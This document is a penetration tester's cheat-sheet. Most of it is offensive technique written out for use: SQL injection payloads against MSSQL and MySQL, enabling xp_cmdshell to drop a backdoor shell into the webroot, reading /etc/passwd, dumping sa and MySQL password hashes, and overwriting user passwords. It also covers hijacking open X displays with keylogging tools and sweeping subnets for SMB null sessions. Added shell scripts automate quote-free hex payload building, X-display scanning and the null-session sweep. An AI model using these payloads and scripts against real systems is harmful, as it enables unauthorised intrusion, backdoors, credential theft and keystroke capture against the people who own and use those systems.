


Start from the binary (gdb launches the process):
$ sudo gdb /usr/sbin/programname
Attach to an already-running process (the second argument is its PID; `gdb -p 4860` does the same):
$ sudo gdb /usr/sbin/programname 4860

(gdb) run                  (only when started from the binary; an attached process is already running, use 'continue')
(gdb) generate-core-file   (writes core.<pid> in the current directory)
(gdb) detach

print stack (equivalent to 'backtrace' or 'bt' command):
(gdb) where

print lines of source code
(gdb) list

register values
(gdb) info reg

Hint: install the relevant debug-symbols package (-dbg or -dbgsym) so 'where' and 'list' show function names and source lines

useful links:

SQLi (mainly MSSQL and MySQL)

Add a flag table as a PoC (also proves you have DDL rights):
CREATE TABLE pentester(was char(5),here char(5))
Verify: if the vuln is error-based SQLi, a well-formed query against the new table returns no error, i.e.:
;SELECT * FROM pentester--
If the table was NOT created successfully, SQL Server returns an error like:
Invalid object name 'pentester'.
Add a new account even if single and/or double quotation marks are filtered. Integers are implicitly converted to strings when the columns are character types, so here both the username and the password become "666" (without quotation marks):
INSERT INTO users (user_id, username, password) VALUES (666,666,666)--
Traverse to a table other than the current one and enumerate its column names (SQL Server HAVING trick):
;select%20*%20from%20users%20having%201=1--
SQL Server answers with an error naming the first column ("Column ... is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause"). Add that column to a GROUP BY clause after the table name and resend; each new error names the next column. Repeat until no more such errors are returned.

Get the actual records. Note: the SELECTed integers are dummy values so the column count matches the statement before the UNION SELECT (MySQL syntax; '+' stands for URL-encoded spaces, 0x3a is ':'):
,0x3a,password),2,3,4,5,6,7+from+users--
Note: SQL Server before 2012 has no concat() function; use the '+' operator to concatenate strings instead.

Enable xp_cmdshell. Only works with sysadmin rights (e.g. sa). Needed on SQL Server 2005 and later, where xp_cmdshell is disabled by default; each sp_configure change must be followed by RECONFIGURE before it takes effect:
EXEC master.dbo.sp_configure "show advanced options", 1
RECONFIGURE
EXEC master.dbo.sp_configure "xp_cmdshell", 1
RECONFIGURE

Then write your backdoor shell code to a file under the webroot (the redirect target must be a file name, not just the directory), i.e.:
EXEC master..xp_cmdshell "echo EVIL_CODE_HERE>d:\inetpub\wwwroot\FILENAME"

Save arbitrary content on the filesystem (useful to achieve remote command execution on MySQL servers). Requires the FILE privilege, a directory writable by the mysqld user, and a target file that does not exist yet:
SELECT "evil content" INTO OUTFILE "/path/to/backdoor.php";
Get user:
or 1=convert(int,(USER))--
Get the sa hash on MS SQL 2005 (reading the password_hash column requires CONTROL SERVER permission):
SELECT password_hash FROM sys.sql_logins where name='sa'
Get file contents ('/etc/passwd' in this case):
SELECT load_file('/etc/passwd');
Use double quotes if single quotes are filtered (MySQL treats double-quoted strings as string literals unless ANSI_QUOTES is enabled):
SELECT load_file("/etc/passwd");
If both single and double quotes are filtered, then hex-encode filename. Note: you can use CAL9000 "straight" hex encoder to retrieve other filenames (don't forget to prepend hex string with '0x'):
SELECT load_file(0x2F6574632F706173737764);
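Hex-encoding the file name by hand, as an added shell helper that is not part of the original notes (nor of CAL9000): the same encoding produces the 0x3a separator used in the concat(username,0x3a,password) payload above, so one helper covers both. It assumes only od and tr from coreutils; the column and separator names passed to concat_payload are whatever you supply.

```shell
#!/usr/bin/env bash
# Added helper (not from the original notes): build MySQL 0x... hex literals so a
# payload contains no quote characters at all. Needs only od and tr.

# Print the MySQL hex literal for an arbitrary string, e.g. mysql_hex /etc/passwd
# gives 0x2F6574632F706173737764 (same value the CAL9000 hex encoder produces).
mysql_hex() {
    local hex
    # od: one byte per field, no addresses, -v keeps runs of identical bytes;
    # tr strips the spacing od inserts and upper-cases the hex digits.
    hex=$(printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n' | tr 'a-f' 'A-F')
    printf '0x%s\n' "$hex"
}

# Build a quote-free load_file() payload for the given path.
loadfile_payload() {
    printf 'SELECT load_file(%s);\n' "$(mysql_hex "$1")"
}

# Build a quote-free concat(col1,<sep>,col2) expression for UNION SELECT payloads.
# $1 = first column, $2 = second column, $3 = separator string (e.g. ':').
# mysql_hex ':' yields 0x3A, the separator used in the records payload above.
concat_payload() {
    printf 'concat(%s,%s,%s)\n' "$1" "$(mysql_hex "$3")" "$2"
}
```

Usage: `loadfile_payload /etc/passwd` prints `SELECT load_file(0x2F6574632F706173737764);` and `concat_payload username password ':'` prints `concat(username,0x3A,password)`; paste either into the injection point in place of the quoted version.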
Examples of interesting payloads (useful for blind SQLi):
UPDATE users SET password="1234" WHERE id=1;
If the target table is not in the current database, qualify it with the database name it belongs to:
UPDATE dbname.users SET password="1234" WHERE id=1;
Blind SQLi delay test (SQL Server):
waitfor delay '0:0:10';
Don't forget to test variations that depend on where the payload lands in the original SQL statement, i.e.:
;waitfor%20delay%20%270:0:10%27--
Blind SQLi boolean test:

 AND 1=1
 AND 1=0
Compare responses. i.e.: different content length, different errors in HTTP headers, etc.

Location of MySQL user hashes: table 'user' within the 'mysql' database (the column is Password up to 5.6 and authentication_string from 5.7 on), i.e.:
SELECT Host,User,Password FROM mysql.user;
Location of *all* MySQL database names and table names: table 'TABLES' within the 'information_schema' database (columns table_schema and table_name).

Useful resources:

Command-line tools:

List of SQLi tools with brief reviews (in Spanish):

Debian/Ubuntu/GNU Linux

Search for package names based on keywords (no root needed):
$ apt-cache search "Text-to-search"
e.g.:
$ apt-cache search "mysql"
Example of network settings:
$ cat /etc/network/interfaces
auto lo
iface lo inet loopback

Finding world-writable and group-writable files and directories (-perm -2: writable by others, -perm -20: writable by group)
# find / -type f \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; 2>/dev/null >writable.txt
# find / -type d \( -perm -2 -o -perm -20 \) -exec ls -ldg {} \; 2>/dev/null >>writable.txt

Finding setuid and setgid files (-perm -004000: setuid, -perm -002000: setgid)
# find / -type f \( -perm -004000 -o -perm -002000 \) -exec ls -lg {} \; 2>/dev/null >suidfiles.txt


Change DNS server settings permanently so they are not overwritten by DHCP:
- edit /etc/dhcp3/dhclient.conf (/etc/dhcp/dhclient.conf on newer releases)
- uncomment the supersede statement and fill in the desired servers, i.e.: supersede domain-name-servers DNS_IP1, DNS_IP2;
- restart networking, i.e.: sudo /etc/init.d/networking restart

Outlook Web Access (OWA) 2003

Exchange admin:

Cross-domain redirect (redirect happens after clicking on "Log on", even if credentials are invalid):

For the following redirect, the credentials must be valid:

VBScript error by assigning a string to the 'reason' parameter (expects a numeric value):

Error returned in HTML:
Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "abc"]'

/exchweb/bin/auth/usa/logon.asp, line 542

Error returned in HTTP headers:
500 Internal Server Error

Advanced phishing: will show the fake login page after logging in while still on the legitimate site.

More info here:

Infrastructure pentesting

Test a cracked/found password via SMB (quote the share so the shell leaves the '$' alone):
$ smbclient '//targethost/ipc$' -U 'username%password'
Packages required to build xkey.c: libxt-dev and probably x11proto-core-dev

If the target is misconfigured and accepts X connections from any host, i.e. someone ran

$ xhost +

on it, then we can:
$ export DISPLAY=server-host-name:0.0
Remember to try different display numbers:
declare -x DISPLAY="server-host-name:1.0"
declare -x DISPLAY="server-host-name:2.0"
etc ...

Which displays exist depends on the open ports: display N listens on tcp/6000+N, so display 0 on tcp/6000, display 1 on tcp/6001 and so on.

Then have fun with X tools. i.e.: xkey, xtv, etc ...
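As an added example (not from the original notes), a shell helper that probes tcp/6000+N for a range of display numbers and prints the matching DISPLAY values; the host name and display range are whatever you pass in. An open port only shows that the X server listens on TCP; whether it actually accepts your connection still depends on its xhost access control, so the X tools themselves remain the final test.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): find X displays exposed over TCP.
# Display N listens on tcp/6000+N, so probing the port range maps to DISPLAY values.

# Return 0 if host:port accepts a TCP connection within 2 seconds.
# Uses bash's /dev/tcp so no nc is needed; timeout is the coreutils command.
port_open() {
    local host=$1 port=$2
    timeout 2 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
}

# Print "host:N.0" for every display number N in [first,last] whose port answers.
# Defaults: displays 0..9 (tcp/6000..6009).
x_displays() {
    local host=$1 first=${2:-0} last=${3:-9} n
    for n in $(seq "$first" "$last"); do
        if port_open "$host" $((6000 + n)); then
            printf '%s:%d.0\n' "$host" "$n"
        fi
    done
}

# Export the first open display so X tools (xwd, xkey, ...) pick it up.
# Returns 1 if nothing answered.
use_first_display() {
    local d
    d=$(x_displays "$@" | head -n1) || return 1
    [ -n "$d" ] || return 1
    export DISPLAY=$d
    printf 'DISPLAY=%s\n' "$DISPLAY"
}
```

Usage: `use_first_display server-host-name 0 5` sets DISPLAY to the lowest display that answered (e.g. `server-host-name:1.0`) in the current shell when sourced; `x_displays server-host-name` alone lists every candidate so you can try them in turn.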

Compaq Insight Manager - now known as HP System Management
default passwords:
default login URL:

Find hosts allowing null sessions in a subnet. The empty "" is the password, -U "" the (empty) user name; the redirected newline answers any remaining prompt so the loop does not block:
$ echo -en "\n" > returnchar.txt
$ for((i=1;i<255;++i));do echo -en "$i ";smbclient \\\\10.10.1.$i\\ipc$ "" -U ""<returnchar.txt;done;
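A fuller version of the sweep as an added example (not from the original notes): `smbclient -N` replaces the newline file, `-c exit` closes the session right after the tree connect, a timeout keeps filtered hosts from stalling the loop, and only hosts that accepted the null session are printed. The 10.10.1 prefix is just the one used above; timeout is the coreutils command.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): sweep a /24 for SMB null sessions
# (empty user, no password) against IPC$ and print only the hosts that accept one.

# Try a null session against one host; exit status 0 means the server let us in.
# -N: never prompt for a password, -U '': empty user name,
# -c exit: run "exit" as the only command, so nothing waits on stdin.
null_session_ok() {
    local host=$1
    timeout 5 smbclient -N -U '' "//$host/ipc\$" -c exit >/dev/null 2>&1
}

# Print every host in prefix.first..last that allowed the null session.
# Defaults: prefix.1 .. prefix.254
null_session_sweep() {
    local prefix=$1 first=${2:-1} last=${3:-254} i
    for i in $(seq "$first" "$last"); do
        if null_session_ok "$prefix.$i"; then
            printf '%s\n' "$prefix.$i"
        fi
    done
}
```

Usage: `null_session_sweep 10.10.1 > nullsessions.txt` leaves one host per line for follow-up enumeration (e.g. `smbclient -N -U '' -L //host` to list shares, or an rpcclient/enum4linux run against the same list).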

Windows tricks/useful commands
find files whose name contains a certain string (case-insensitive search):
dir \ /s /b | find /I "password"
find files whose contents contain a certain string (case-insensitive search, recursive from the root of the drive):
findstr /i /s "password" \*